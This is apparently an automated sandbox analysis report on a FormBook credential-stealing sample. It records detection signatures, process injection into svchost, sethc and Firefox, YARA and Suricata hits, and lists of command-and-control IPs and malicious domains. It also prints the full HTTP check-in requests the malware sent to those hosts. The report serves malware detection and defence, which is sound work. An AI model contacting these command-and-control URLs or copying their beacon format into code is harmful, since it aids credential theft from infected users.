
Windows Analysis Report
ek8LkB2Cgo.exe

Overview

General Information

Sample name: ek8LkB2Cgo.exe (renamed because original name is a hash value)
Original sample name: 00852cad9ef3c816fa777f405bda3d30a62fbaed64a2489ce859b30734705959.exe
Analysis ID: 1568372
MD5: 0e566d86bc0eb9416765e07f7ba17392
SHA1: 2e1611cb6b9475a463765c05c0a3819d4ae9fd25
SHA256: 00852cad9ef3c816fa777f405bda3d30a62fbaed64a2489ce859b30734705959
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ek8LkB2Cgo.exe (PID: 7632 cmdline: "C:\Users\user\Desktop\ek8LkB2Cgo.exe" MD5: 0E566D86BC0EB9416765E07F7BA17392)
    • svchost.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\ek8LkB2Cgo.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • RlKZsaoEJNpD.exe (PID: 5764 cmdline: "C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sethc.exe (PID: 7964 cmdline: "C:\Windows\SysWOW64\sethc.exe" MD5: AA9A6E4DADA121001CFDF184B9758BBE)
          • RlKZsaoEJNpD.exe (PID: 7000 cmdline: "C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6920 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.3778150312.00000000049B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3778103471.0000000004960000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1542930105.00000000030D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3780336358.0000000005610000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3771923815.0000000000C80000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", CommandLine: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", ParentImage: C:\Users\user\Desktop\ek8LkB2Cgo.exe, ParentProcessId: 7632, ParentProcessName: ek8LkB2Cgo.exe, ProcessCommandLine: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", ProcessId: 7708, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", CommandLine: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", ParentImage: C:\Users\user\Desktop\ek8LkB2Cgo.exe, ParentProcessId: 7632, ParentProcessName: ek8LkB2Cgo.exe, ProcessCommandLine: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", ProcessId: 7708, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-04T15:31:24.306593+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49771 | 172.67.185.6 | 80 | TCP
2024-12-04T15:31:49.735217+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49825 | 156.251.17.224 | 80 | TCP
2024-12-04T15:32:04.688712+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49856 | 172.67.145.234 | 80 | TCP
2024-12-04T15:32:19.812101+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49891 | 13.248.169.48 | 80 | TCP
2024-12-04T15:32:55.177168+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49924 | 43.199.54.158 | 80 | TCP
2024-12-04T15:33:10.647912+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49991 | 136.143.186.12 | 80 | TCP
2024-12-04T15:33:25.704735+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49996 | 172.67.192.207 | 80 | TCP
2024-12-04T15:33:40.669477+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 50000 | 203.161.43.228 | 80 | TCP
2024-12-04T15:33:56.925217+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 50004 | 8.223.59.213 | 80 | TCP
2024-12-04T15:34:12.096342+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 50008 | 54.176.168.58 | 80 | TCP
2024-12-04T15:34:27.408010+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 50012 | 199.59.243.227 | 80 | TCP
2024-12-04T15:34:43.331647+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 50016 | 85.159.66.93 | 80 | TCP

AV Detection

Source: http://www.duwixushx.xyz/fyc8/ Avira URL Cloud: Label: malware
Source: http://www.aextligrwjv.best/msiy/?9hy=gvrDS8U8OP&GhEtuH=vWnR7wTg66d2ddFO/hOe3tyOuhU6gKBnFLqMp8Vj889T3d63TkYAebsAkWFQIzapGgDNCMxKcgjSNeLYtFe43HwIPdM+jeFQKV7h03gcmWP5dRjf9VfH50dWMQ/EONfHOgL151a+js8J Avira URL Cloud: Label: malware
Source: http://www.duwixushx.xyz/fyc8/?GhEtuH=9quk7MnvWgGB/+oSKiWFDzYoPJYT6eA3ueh2PF/6PpTLuIpSuGh5poP5vhKU1hzLJrxVAWnbk59J+ABTrLnIqcNR2VABk2apNjRDHz4+NFXCe5SYECaGO4YN/+FCU+q/RL6A2UBNebQ0&9hy=gvrDS8U8OP Avira URL Cloud: Label: malware
Source: ek8LkB2Cgo.exe ReversingLabs: Detection: 73%
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3778150312.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3778103471.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1542930105.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3780336358.0000000005610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3771923815.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1542601983.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3778462020.00000000030B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1543326979.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: ek8LkB2Cgo.exe Joe Sandbox ML: detected
Source: ek8LkB2Cgo.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: sethc.pdbGCTL source: svchost.exe, 00000002.00000003.1511378407.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1511473960.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000002.3777425420.000000000131E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RlKZsaoEJNpD.exe, 00000005.00000000.1468541461.0000000000AAE000.00000002.00000001.01000000.00000005.sdmp, RlKZsaoEJNpD.exe, 00000007.00000000.1632177564.0000000000AAE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: ek8LkB2Cgo.exe, 00000000.00000003.1309997616.0000000004080000.00000004.00001000.00020000.00000000.sdmp, ek8LkB2Cgo.exe, 00000000.00000003.1308681911.0000000004220000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1443349259.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1449140378.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.0000000003200000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778379933.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1561229926.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778379933.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1558779585.000000000486F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ek8LkB2Cgo.exe, 00000000.00000003.1309997616.0000000004080000.00000004.00001000.00020000.00000000.sdmp, ek8LkB2Cgo.exe, 00000000.00000003.1308681911.0000000004220000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1443349259.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1449140378.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.0000000003200000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, sethc.exe, 00000006.00000002.3778379933.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1561229926.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778379933.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1558779585.000000000486F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sethc.pdb source: svchost.exe, 00000002.00000003.1511378407.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1511473960.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000002.3777425420.000000000131E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: sethc.exe, 00000006.00000002.3776235683.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778868913.00000000051EC000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000031DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1865208225.000000000692C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: sethc.exe, 00000006.00000002.3776235683.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778868913.00000000051EC000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000031DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1865208225.000000000692C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe Code function: 0_2_00536CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00536CA9
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe Code function: 0_2_005360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_005360DD
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe Code function: 0_2_005363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_005363F9
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe Code function: 0_2_0053EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0053EB60
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe Code function: 0_2_0053F56F FindFirstFileW,FindClose,0_2_0053F56F
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe Code function: 0_2_0053F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0053F5FA
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe Code function: 0_2_00541B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00541B2F
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe Code function: 0_2_00541C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00541C8A
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe Code function: 0_2_00541F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00541F94
Source: C:\Windows\SysWOW64\sethc.exe Code function: 6_2_00C9C670 FindFirstFileW,FindNextFileW,FindClose,6_2_00C9C670
Source: C:\Windows\SysWOW64\sethc.exe Code function: 4x nop then xor eax, eax 6_2_00C89EA0
Source: C:\Windows\SysWOW64\sethc.exe Code function: 4x nop then mov ebx, 00000004h 6_2_04AB04EF

Networking

Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49771 -> 172.67.185.6:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49825 -> 156.251.17.224:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49856 -> 172.67.145.234:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49891 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49924 -> 43.199.54.158:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49991 -> 136.143.186.12:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49996 -> 172.67.192.207:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50004 -> 8.223.59.213:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50000 -> 203.161.43.228:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50012 -> 199.59.243.227:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50008 -> 54.176.168.58:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50016 -> 85.159.66.93:80
Source: DNS query: www.duwixushx.xyz
Source: DNS query: www.futurorks.xyz
Source: DNS query: www.dating-ml-es.xyz
Source: DNS query: www.soainsaat.xyz
Source: Joe Sandbox View IP Address: 13.248.169.48
Source: Joe Sandbox View IP Address: 136.143.186.12
Source: Joe Sandbox View ASN Name: AMAZON-02US
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: BODIS-NJUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\ek8LkB2Cgo.exe Code function: 0_2_00544EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00544EB5
Source: global traffic HTTP traffic detected:
  GET /msiy/?9hy=gvrDS8U8OP&GhEtuH=vWnR7wTg66d2ddFO/hOe3tyOuhU6gKBnFLqMp8Vj889T3d63TkYAebsAkWFQIzapGgDNCMxKcgjSNeLYtFe43HwIPdM+jeFQKV7h03gcmWP5dRjf9VfH50dWMQ/EONfHOgL151a+js8J HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.aextligrwjv.best
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic HTTP traffic detected:
  GET /fyc8/?GhEtuH=9quk7MnvWgGB/+oSKiWFDzYoPJYT6eA3ueh2PF/6PpTLuIpSuGh5poP5vhKU1hzLJrxVAWnbk59J+ABTrLnIqcNR2VABk2apNjRDHz4+NFXCe5SYECaGO4YN/+FCU+q/RL6A2UBNebQ0&9hy=gvrDS8U8OP HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.duwixushx.xyz
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic HTTP traffic detected:
  GET /t4v0/?GhEtuH=BaKEDIuCqsvR37Bn6+TgiJMwkxJzDUIqAYq0m1TFifk8gDAIMlekNhph8Tar9Z0dtwi6g0hFX56VxC4Q/su0r8fyWQFgq8KpC42yk6uDr99A+ZghhUp+L9tXlGYeR9GDO3Mz2SBmPslm&9hy=gvrDS8U8OP HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.vayui.top
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic HTTP traffic detected:
  GET /4azw/?GhEtuH=iNk8TUzs4LA0xmLiyfXL0hgGjATAFsDni+5ztJ1xT71fUrCnNyUyZAqYt2rVyg4lMrt3jHF8wf6EsZ4R3qyrto5tvwrKQEVqglgZMsYf2yPShcLO5aI9UsQg5wD70CMaNZMdAFkLH0kf&9hy=gvrDS8U8OP HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.remedies.pro
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic HTTP traffic detected:
  GET /iyce/?9hy=gvrDS8U8OP&GhEtuH=3t7JC5hyAznKgFuU/ok1lWIiNGSssLiqmP3wqdAXOPpvMCbWrZKV3/4RkaY4Wf52BZA497amiF58UAMjS7eJfGDv95acxgS2B5U2yxi5cABrTEK2ZEsstqoE20nhTJm6WmYVOoPh7UOe HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.327531.buzz
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic HTTP traffic detected:
  GET /hxjq/?GhEtuH=BKNo6O8yWzEApXpxZdhvBLsS4mUhkJt064RYd0HbUq7fKEZlE0/hsCP6DjMyuX8dqHZGPQa4k2P/eM3nbiU+NzaMvzu4IfNUiCKwEJ3hTOhx8HANTpWY2e8g5zzoSZCTjrGp61nu9rmD&9hy=gvrDS8U8OP HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.everythlngict.org
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic HTTP traffic detected:
  GET /8292/?GhEtuH=dnAXxbFHa6RK1uN3p+sQJBgkj7tI4LA3ZFKVH8On554fy+qRTfvRsSc0GNZ8hi+JaenG7xaf5F4Z1N3TeCmANQO8Fwm04ZJnyd/RH1yf5K4Kkfm0UhvZq/AJXt0L6OF1dgVk5sLd5yBY&9hy=gvrDS8U8OP HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.3kw40881107247y.click
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic HTTP traffic detected:
  GET /cpty/?GhEtuH=FOqfvw/D9TxLZ9zn5tlxjpsMOed4GZEMgX1z5u2hu/q28qXHvFp93Fs8lYoTq8WZ051sNJVY/UqOjH0F7ziUmXJv/tNxSQB91KtCf68XTy52NA+Nrb8mvfzj4zmGoOcEjhOtBV7kDBoK&9hy=gvrDS8U8OP HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.futurorks.xyz
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic HTTP traffic detected:
  GET /3pje/?GhEtuH=2C5VcNcdbhFphNwA7gbLu4o0N5MJpmvs9kBgNmJqElzxjYuhWh9e33X7OaqqoaP4YBwO1oY27LwLJ/gdnK1kbQ0HR4V8Mf1XFtPz1ewRRkQFG47cZvjpm9IGNViEPL31rvHero6O+mYM&9hy=gvrDS8U8OP HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.hwbzfdtn.tokyo
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic HTTP traffic detected:
  GET /zgqx/?GhEtuH=vpXfiL7xAiwEgavhBJ5+dVbyToiv3Ajc9/9k/kyom/IPODfyHTsY9MNM1oIIcM9OOPgjl+yjy+dwg4YL1U+Z+aAXCKq38CY4+hImZkjI6IAgM5qe0htR9lzNJYnqwffYKnUXs/x3ziJB&9hy=gvrDS8U8OP HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.129glenforest.com
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic HTTP traffic detected:
  GET /pvrm/?GhEtuH=q9VU5shSkDSssKORJVQgPyBT6NXL0uGF1tcH5gjeNKzzvUK22qQBZnHtscqLZ9MjFbahEO+8XCavPFU5GWG6ZiikqcFlEViNL/eErSple439PFpGhjhhgUgyeLHF+kDRjmkJ2QCUDUlW&9hy=gvrDS8U8OP HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.dating-ml-es.xyz
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic HTTP traffic detected:
  GET /912o/?GhEtuH=70ci5pGKsfR7ryWTKFtFiUt7/TqIPHf64KC8vmTT6Dtcu2BtDGHTaTjOoGUC2iu8k3BJ4N7Du7dNBD6fJpU48FM3duIc/ctQLZHS0QyH+uuzGzjKGZHdmjrbFNuBsSBruIhtULDLHkLM&9hy=gvrDS8U8OP HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.soainsaat.xyz
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic DNS traffic detected: DNS query: www.aextligrwjv.best
Source: global traffic DNS traffic detected: DNS query: www.duwixushx.xyz
Source: global traffic DNS traffic detected: DNS query: www.vayui.top
Source: global traffic DNS traffic detected: DNS query: www.remedies.pro
Source: global traffic DNS traffic detected: DNS query: www.327531.buzz
Source: global traffic DNS traffic detected: DNS query: www.everythlngict.org
Source: global traffic DNS traffic detected: DNS query: www.3kw40881107247y.click
Source: global traffic DNS traffic detected: DNS query: www.futurorks.xyz
Source: global traffic DNS traffic detected: DNS query: www.hwbzfdtn.tokyo
Source: global traffic DNS traffic detected: DNS query: www.129glenforest.com
Source: global traffic DNS traffic detected: DNS query: www.dating-ml-es.xyz
